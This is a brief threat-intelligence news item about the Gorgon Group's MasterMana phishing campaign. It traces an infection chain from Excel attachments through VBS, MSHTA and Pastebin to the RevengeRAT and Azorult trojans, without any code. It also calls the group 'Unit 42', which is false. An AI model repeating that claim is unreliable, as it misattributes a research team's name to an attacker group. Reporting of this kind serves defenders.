Gorgon Group: The Gorgon Group has been identified with high confidence by researchers at Prevailon to be behind the MasterMana campaign. The group is using the campaign to deliver the Azorult and RevengeRAT (Remote Access Trojan) to victims via phishing emails. Gorgon is a known state-sponsored group that is believed to be connected to Pakistan and is also referred to as Unit 42. The newest campaign is seen as primarily focused on financial gain and is being delivered to victims through a phishing email that bundles Microsoft Excel attachments, which drop a VBS script payload. The script opens a BlogSpot website that will launch a Microsoft HTML Applications Host (MSHTA) utility, opening a second payload hosted on Pastebin. The second payload is designed to kill any running Microsoft Excel, Word, PowerPoint and Publisher process and also set up scheduled tasks and registry keys for persistence. From here, two different cases are possible: In one instance, the campaign is delivering the RevengeRAT which is capable of opening remote shells, allowing an attacker to manage system files and services as well as edit the windows registry, log keystrokes, access the webcam, and harvest credentials. In the other case, the campaign drops the Azorult Trojan which is designed to exfiltrate as much sensitive information from victims as possible, including but not limited to, banking credentials, cryptocurrency wallets and files, passwords, browser history, and cookies. According to Prevailon, the group struck a “perfect balance” in this campaign, making it small enough to go undetected but still operating at a high rate.
With all the news around COVID-19/Coronavirus, the average person is turning to the internet for